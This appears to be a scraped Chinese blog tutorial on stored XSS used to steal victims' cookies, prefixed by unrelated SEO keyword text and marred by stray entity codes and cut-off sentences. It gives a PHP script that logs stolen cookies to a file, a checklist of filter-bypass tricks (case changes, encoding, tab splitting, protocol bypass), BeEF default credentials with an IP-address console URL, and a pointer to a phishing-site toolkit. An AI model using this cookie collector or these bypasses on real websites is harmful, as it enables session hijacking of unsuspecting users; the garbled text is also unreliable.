网站做推荐链接端口,上海出啥大事了,网站关键词排名批量查询,深圳开发app的公司有哪些XSS脚本#xff08;存储型xss获取肉鸡的cookies#xff09; 存储型XSS就是在能够提交上传的文本框中提交一些标签代码#xff0c;这段代码被插入到页面中#xff0c;肉鸡每次点击这个页面时都会有弹框弹出。#xff08;只要点击就会弹框#xff09; 反射性XSS顾名思义插入…XSS脚本存储型xss获取肉鸡的cookies 存储型XSS就是在能够提交上传的文本框中提交一些标签代码这段代码被插入到页面中肉鸡每次点击这个页面时都会有弹框弹出。只要点击就会弹框 反射性XSS顾名思义插入
vim /var/www/html/cookie_rec.php ?php $cookie $_GET[cookie]; $log fopen(cookie.txt,a); fwrite($log, $cookie . \n); fclose($log); ?
2、增加目录权限
chown -R www-data.www-data /var/www 3、访问靶机
4、之后当有人访问这个页面时就会有弹框
存储型Xss排查思路 1、首先依次排查标签是否被禁用script、img、iframe等 绕过思路
标签大小写 标签转义、双重转义、加密 替换关键字 使用编码十六进制、二次编码、Unicode编码 2、测试排查某些符号是否被禁用转义尖括号、引号、空格、等号 绕过思路
对符号进行编码 转义、双重转义、尖括号闭合 加密 使用注释 重音符来包含代码 内嵌TAB、换行符等分割攻击代码 3、检查xss的验证机制是通过前端验证或是后端验证、还是前后端均验证。 排查思路
查看HTML源码前端是否存在某些限制文本框长度、符号分割空格逗号等、标签禁用、符号禁用、标签符号过滤等JS或方法 使用burpsuite绕过前端发起请求 4、针对1、2、3过程的排查进行针对性的注入 常见注入
标签闭合 注释、字符转义 事件处理程序 编码 协议绕过 内嵌TAB、回车 参考https://www.freebuf.com/articles/web/153055.html
BeEf工具的使用
注入的语句
账号密码beef : debian4eva UI地址http://139.198.21.183:8808/ui/authentication
setookit制作钓鱼网站工具
